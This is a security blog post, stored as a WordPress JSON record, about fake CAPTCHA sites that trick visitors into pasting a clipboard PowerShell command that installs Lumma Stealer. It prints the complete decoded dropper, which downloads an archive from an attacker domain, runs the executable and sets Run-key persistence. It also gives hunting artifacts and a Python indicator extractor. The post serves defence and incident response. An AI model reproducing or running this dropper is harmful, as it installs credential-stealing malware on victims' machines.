{"id":27162,"date":"2024-09-21T22:20:07","date_gmt":"2024-09-21T22:20:07","guid":{"rendered":"https:\/\/gridinsoft.com\/blogs\/?p=27162"},"modified":"2024-11-03T21:20:54","modified_gmt":"2024-11-03T21:20:54","slug":"fake-captcha-sites-malicious-code-lumma-stealer","status":"publish","type":"post","link":"https:\/\/gridinsoft.com\/blogs\/fake-captcha-sites-malicious-code-lumma-stealer\/","title":{"rendered":"Fake CAPTCHA Sites Trick Users to Run Malicious Code, Install Lumma Stealer"},"content":{"rendered":"<p>A new malware-spreading campaign is picking up steam on the Internet, <strong>luring users to fake CAPTCHA websites<\/strong>. Visitors are asked to press a sequence of key combinations to prove they are not a robot; doing so runs a command that infects the machine with malware. As the analysis shows, the malware installed this way is Lumma Stealer. Let\u2019s take a closer look at how this works and how you can protect yourself.<\/p>\n<h2>Lumma Stealer from a fake CAPTCHA check: Campaign overview<\/h2>\n<p>On September 20, quite a few analysts pointed at a rather unusual malware-spreading campaign hosted on fake CAPTCHA websites. The attackers set up such a landing page and redirect to it from a dodgy website. Our observations led to a chain of pages that offer pirated movies; we met the same sites <a href=\"https:\/\/gridinsoft.com\/blogs\/free-tl-pop-up-virus\/\">in other redirection campaigns<\/a>, though with less worrying consequences. The pages hosting the fraudulent anti-robot checks, however, are new; all four observed so far sit on subdomains of a public CDN (b-cdn[.]net), so blocking the parent domain would also block legitimate content.<\/p>\n<figure id=\"attachment_27163\" aria-describedby=\"caption-attachment-27163\" style=\"width: 511px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/09\/scam-captcha-site.webp\" alt=\"Fake CAPTCHA website\" width=\"511\" height=\"500\" class=\"size-full wp-image-27163\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/09\/scam-captcha-site.webp 511w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/09\/scam-captcha-site-300x294.webp 300w\" sizes=\"auto, (max-width: 511px) 100vw, 511px\" \/><figcaption id=\"caption-attachment-27163\" class=\"wp-caption-text\">Example of a fake CAPTCHA website<\/figcaption><\/figure>\n<h3>List of fake CAPTCHA domains<\/h3>\n<div class=\"su-table su-table-alternate\">\n<table>\n<thead>\n<tr>\n<th>URL<\/th>\n<th>Analysis<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>stage-second-v2c.b-cdn[.]net<\/td>\n<td><a href=\"https:\/\/gridinsoft.com\/online-virus-scanner\/url\/stage_second_v2c-b_cdn-net\">Scan Report<\/a><\/td>\n<\/tr>\n<tr>\n<td>antibotx.b-cdn[.]net<\/td>\n<td><a href=\"https:\/\/gridinsoft.com\/online-virus-scanner\/url\/antibotx-b_cdn-net\">Scan Report<\/a><\/td>\n<\/tr>\n<tr>\n<td>bostfick.b-cdn[.]net<\/td>\n<td><a href=\"https:\/\/gridinsoft.com\/online-virus-scanner\/url\/bostfick-b_cdn-net\">Scan Report<\/a><\/td>\n<\/tr>\n<tr>\n<td>fuse19.b-cdn[.]net<\/td>\n<td><a href=\"https:\/\/gridinsoft.com\/online-virus-scanner\/url\/fuse19-b_cdn-net\">Scan Report<\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>What these landing pages do is ask for \u201chuman verification\u201d by pressing a sequence of key combinations. 
The list of demanded combinations appears as soon as the victim clicks the \u201cI am not a robot\u201d button and reads as follows:<\/p>\n<p><code>Press Windows Button (Win+R)<br \/>\nPress CTRL + V<br \/>\nPress Enter<br \/>\n<\/code><\/p>\n<p>The trick here is that <strong>clicking the button makes the site copy a malicious command into the clipboard<\/strong>. Browsers only let a page write to the clipboard in response to a user gesture such as a click, which is exactly why the fake check needs a button to press. Win+R opens the Windows Run dialog, Ctrl+V pastes the command into it, and Enter executes it: the pasted command starts PowerShell, and PowerShell runs the actual dropper. The victim never downloads an obvious file, so no download warning or browser file check gets a chance to intervene.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/09\/scam-captcha-key-combinations.webp\" alt=\"Malicious instructions\" width=\"511\" height=\"605\" class=\"aligncenter size-full wp-image-27167\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/09\/scam-captcha-key-combinations.webp 511w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/09\/scam-captcha-key-combinations-253x300.webp 253w\" sizes=\"auto, (max-width: 511px) 100vw, 511px\" \/><\/p>\n<p><strong>We extracted the command one of these sites uses<\/strong>, and it is not complicated. It contains a straightforward instruction: download an archive from a remote server into the user\u2019s profile, unpack it, run the executable inside and register that executable to start at every logon. The command placed in the clipboard is base64-encoded, which keeps the URL and the file paths out of sight of a casual look and of naive string matching; decoded, it is the script below. Even the decoded script is lightly obfuscated: the variable names are random, and the cmdlet names use randomly mixed letter case (<code>teSt-PATh<\/code>, <code>sTART-bItstransfEr<\/code>), which costs the attacker nothing because PowerShell is case-insensitive but breaks signatures that look for the exact spelling.<\/p>\n<p><code style=\"font-size: 14px\">$BCKUinyM='https:\/\/finalsteptogo[.]com\/uploads\/tera14.zip'; $bpshwy7J=$env:APPDATA+'\\WycT1ndu'; $EIjUwZlK=$env:APPDATA+'\\yURiiySE.zip'; $avcKTKQb=$bpshwy7J+'\\Set-up.exe'; if (-not (teSt-PATh $bpshwy7J)) { neW-iTeM -Path $bpshwy7J -ItemType Directory }; sTART-bItstransfEr -Source $BCKUinyM -Destination $EIjUwZlK; EXpAnD-arChiVE -Path $EIjUwZlK -DestinationPath $bpshwy7J -Force; rEmOVE-ItEM $EIjUwZlK; STArT-procEsS $avcKTKQb; neW-IteMPROPeRTY -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'Ww5EqxGa' -Value $avcKTKQb -PropertyType 'String';<\/code><\/p>\n<p>Step by step, the script downloads <code>tera14.zip<\/code> through the BITS service (<code>Start-BitsTransfer<\/code>) into <code>%APPDATA%<\/code>, unpacks it into a freshly created folder there, deletes the archive, launches <code>Set-up.exe<\/code> from that folder and, finally, writes the path of that executable into <code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run<\/code>, so the stealer restarts at every logon. Nothing in it requires administrator rights: everything stays inside the user\u2019s own profile and registry hive, which is why no UAC prompt ever appears. For incident responders, the chain leaves several artifacts: the pasted command stays in the Run dialog history (<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU<\/code>), the download is recorded in the <code>Microsoft-Windows-Bits-Client\/Operational<\/code> event log, and with script block logging enabled the decoded script lands in PowerShell event 4104. A Run dialog history entry that starts PowerShell is a strong hunting signal on its own.<\/p>\n<h2>Consequences<\/h2>\n<p>As mentioned in the introduction, this campaign aims at spreading <a href=\"https:\/\/gridinsoft.com\/spyware\/lumma-stealer\">Lumma Stealer<\/a>, a prolific infostealer that has been sold as malware-as-a-service since 2022 and in 2024 became one of the leading malicious programs by volume of attacks, primarily targeting individuals. As is typical for modern infostealers, Lumma gathers passwords for online accounts and desktop apps, paying special attention to cryptocurrency wallets. What sets it apart is its internal design, which goes to considerable lengths to avoid anti-malware detection.<\/p>\n<p><strong>Elaborate distribution campaigns are nothing new for Lumma Stealer.<\/strong> Earlier, it was tucked into pirated games and software that were <a href=\"https:\/\/gridinsoft.com\/blogs\/youtube-videos-cracks-lumma-stealer\/\">promoted on a hijacked YouTube channel<\/a>. Its operators also seem to piggyback on every major news event in the gaming or software industry.<\/p>\n<h2>How to Protect Yourself?<\/h2>\n<p>As always, <strong>avoiding the threat is the best protection<\/strong>. Poking around sketchy sites may feel harmless, but the danger surfaces sooner or later. 
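<p>As an added example (not part of the original article and not GridinSoft\u2019s tooling), the Python script below takes a dropper like the one extracted above and reverses the two cheap obfuscation tricks it relies on: it lowercases the randomly cased cmdlet names outside quoted strings and resolves the random variable names, so the download URL, the drop directory, the executable and the Run-key persistence entry come out in clear, together with a list of behaviour tags that can feed a detection rule. The sample input is the command quoted above with the domain left defanged; <code>$env:APPDATA<\/code> is rendered as the placeholder <code>%APPDATA%<\/code>, and the download and persistence patterns are an illustrative starting point, not a complete signature set.<\/p>\n

```python
"""
Normalize an obfuscated PowerShell dropper one-liner and extract its indicators.

Added example, not code from the article. Assumes the style seen in the sample:
single-quoted literals, $var / $env:VAR joined with '+', ';' between statements.
$env:APPDATA is rendered as the placeholder %APPDATA% rather than a real path.
"""
import json
import re

# Constructed sample: the command quoted in the article, domain left defanged with "[.]".
SAMPLE = (
    "$BCKUinyM='https://finalsteptogo[.]com/uploads/tera14.zip'; "
    "$bpshwy7J=$env:APPDATA+'\\WycT1ndu'; "
    "$EIjUwZlK=$env:APPDATA+'\\yURiiySE.zip'; "
    "$avcKTKQb=$bpshwy7J+'\\Set-up.exe'; "
    "if (-not (teSt-PATh $bpshwy7J)) { neW-iTeM -Path $bpshwy7J -ItemType Directory }; "
    "sTART-bItstransfEr -Source $BCKUinyM -Destination $EIjUwZlK; "
    "EXpAnD-arChiVE -Path $EIjUwZlK -DestinationPath $bpshwy7J -Force; "
    "rEmOVE-ItEM $EIjUwZlK; "
    "STArT-procEsS $avcKTKQb; "
    "neW-IteMPROPeRTY -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' "
    "-Name 'Ww5EqxGa' -Value $avcKTKQb -PropertyType 'String';"
)

CMDLET_RE = re.compile(r"\b([A-Za-z]+-[A-Za-z]+)\b")   # Verb-Noun cmdlet names
QUOTED_RE = re.compile(r"'[^']*'")                      # single-quoted literals
ASSIGN_RE = re.compile(r"^\$(\w+)\s*=\s*(.+)$")         # $name = <expr>
ENV_RE = re.compile(r"\$env:(\w+)", re.IGNORECASE)      # $env:VAR
VAR_RE = re.compile(r"\$(\w+)")                         # $name
URL_RE = re.compile(r"https?://[^\s'\"]+")
PERSIST_RE = re.compile(
    r"new-itemproperty\s+-path\s+'([^']+)'\s+-name\s+'([^']+)'\s+-value\s+'([^']+)'",
    re.IGNORECASE,
)
# Behaviour tags (illustrative, not exhaustive); matched against the normalized script.
BEHAVIOURS = [
    ("download", re.compile(r"\b(start-bitstransfer|invoke-webrequest|invoke-restmethod)\b")),
    ("archive_extract", re.compile(r"\bexpand-archive\b")),
    ("execute_from_appdata", re.compile(r"\bstart-process\s+'%APPDATA%")),
    ("run_key_persistence", re.compile(r"currentversion\\run'", re.IGNORECASE)),
    ("cleanup", re.compile(r"\bremove-item\b")),
]


def split_outside_quotes(text: str, sep: str) -> list[str]:
    """Split on a one-character separator, ignoring separators inside '...'."""
    parts, buf, in_quote = [], [], False
    for ch in text:
        if ch == "'":
            in_quote = not in_quote
        if ch == sep and not in_quote:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return parts


def normalize_case(stmt: str) -> str:
    """Lowercase cmdlet names outside quoted literals. PowerShell is case-insensitive,
    so the random casing changes nothing for the attacker but defeats exact-string matches."""
    unquoted = QUOTED_RE.split(stmt)
    quoted = QUOTED_RE.findall(stmt)
    lowered = [CMDLET_RE.sub(lambda m: m.group(1).lower(), seg) for seg in unquoted]
    out = [lowered[0]]
    for q, seg in zip(quoted, lowered[1:]):
        out.extend((q, seg))
    return "".join(out)


def eval_expr(expr: str, variables: dict[str, str]) -> str:
    """Evaluate a '+' concatenation of 'literals', $env:VAR and $var references."""
    value = ""
    for part in split_outside_quotes(expr, "+"):
        part = part.strip()
        if len(part) >= 2 and part[0] == part[-1] == "'":
            value += part[1:-1]
        elif m := ENV_RE.fullmatch(part):
            value += "%" + m.group(1).upper() + "%"   # placeholder, not the real path
        elif m := VAR_RE.fullmatch(part):
            if m.group(1) not in variables:
                raise ValueError(f"unresolved variable ${m.group(1)}")
            value += variables[m.group(1)]
        else:
            raise ValueError(f"unsupported expression: {part}")
    return value


def analyze(script: str) -> dict:
    """Resolve variables, normalize cmdlet case and extract indicators."""
    variables: dict[str, str] = {}
    resolved: list[str] = []
    for raw in split_outside_quotes(script, ";"):
        stmt = normalize_case(raw.strip())
        if not stmt:
            continue
        if m := ASSIGN_RE.match(stmt):            # remember $var = ... for later statements
            variables[m.group(1)] = eval_expr(m.group(2), variables)
            continue
        stmt = ENV_RE.sub(lambda m: "%" + m.group(1).upper() + "%", stmt)
        stmt = VAR_RE.sub(lambda m: "'" + variables.get(m.group(1), "$" + m.group(1)) + "'", stmt)
        resolved.append(stmt)
    text = "\n".join(resolved)
    return {
        "variables": variables,
        "script": text,
        "urls": sorted(set(URL_RE.findall(text))),
        "persistence": [{"key": k, "name": n, "value": v} for k, n, v in PERSIST_RE.findall(text)],
        "behaviours": [tag for tag, rx in BEHAVIOURS if rx.search(text)],
    }


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE), indent=2))
```

<p>Run stand-alone, the script prints a JSON summary of the sample. In practice the input would come from a RunMRU value or a PowerShell 4104 script block event rather than a pasted constant, and the behaviour tags (a BITS download, archive extraction, execution from <code>%APPDATA%<\/code> and a Run-key write, all in one short script) are the combination a detection rule should key on rather than any single URL or file name, which the attackers rotate freely.<\/p>\n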
Stopping visits to and interactions with pages that redirect you or show excessive amounts of ads goes a long way toward reducing the risk. And one rule costs nothing: a real CAPTCHA never asks you to press Win+R, to paste anything, or to run a command. The moment a \u201cverification\u201d wants you to open the Run dialog or a terminal, close the tab; whatever you would paste runs with your own user rights, and no administrator prompt will stop it. Organizations can go a step further and remove the Run dialog through Group Policy (the \u201cRemove Run menu from Start Menu\u201d user policy also disables the Win+R shortcut), which takes the first step of this chain away from users who never need it.<\/p>\n<div class=\"su-note\"  style=\"border-color:#e4e4ce;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;\"><div class=\"su-note-inner su-u-clearfix su-u-trim\" style=\"background-color:#fefee8;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;\">Not sure whether you can trust the site? Consider scanning it on our <a href=\"https:\/\/gridinsoft.com\/website-reputation-checker\">website reputation checker<\/a>! It goes through the entire website, checking the safety of its contents by a selection of parameters. Just 15 seconds \u2013 and you will have a verdict on whether the website is trustworthy.<\/div><\/div>\n<p>Still, malware sometimes hits from an unexpected angle, and for that case reliable anti-malware software is needed. GridinSoft Anti-Malware has you covered: its network security and heuristic protection repel even evasive threats.<\/p>\n<p style=\"padding-top:15px;padding-bottom:15px;\"><a href=\"\/download\/antimalware\" rel=\"nofollow\"><img loading=\"lazy\" decoding=\"async\" src=\"\/blogs\/wp-content\/uploads\/2022\/07\/env01.webp\" alt=\"Fake CAPTCHA Sites Trick Users to Run Malicious Code, Install Lumma Stealer\" width=\"798\" height=\"336\" class=\"aligncenter size-full\" title=\"\"><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A new malware-spreading campaign is picking up steam on the Internet, luring users to fake CAPTCHA websites. Visitors are asked to press a sequence of key combinations to prove they are not a robot; doing so runs a command that infects the machine with malware. As the analysis shows, the malware installed this way is Lumma Stealer. 
Let\u2019s [&hellip;]<\/p>\n","protected":false},"author":7,"featured_media":27174,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"categories":[15],"tags":[619,28,40],"class_list":{"0":"post-27162","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-security-news","8":"tag-cybersecurity","9":"tag-malware","10":"tag-online-security"},"featured_image_src":"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/09\/fake-captcha-sites.webp","author_info":{"display_name":"Stephanie Adlam","author_link":"https:\/\/gridinsoft.com\/blogs\/author\/adlam\/"},"_links":{"self":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/27162","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/comments?post=27162"}],"version-history":[{"count":15,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/27162\/revisions"}],"predecessor-version":[{"id":28064,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/27162\/revisions\/28064"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media\/27174"}],"wp:attachment":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media?parent=27162"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/categories?post=27162"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/tags?post=27162"}],"curies":[{"name
":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}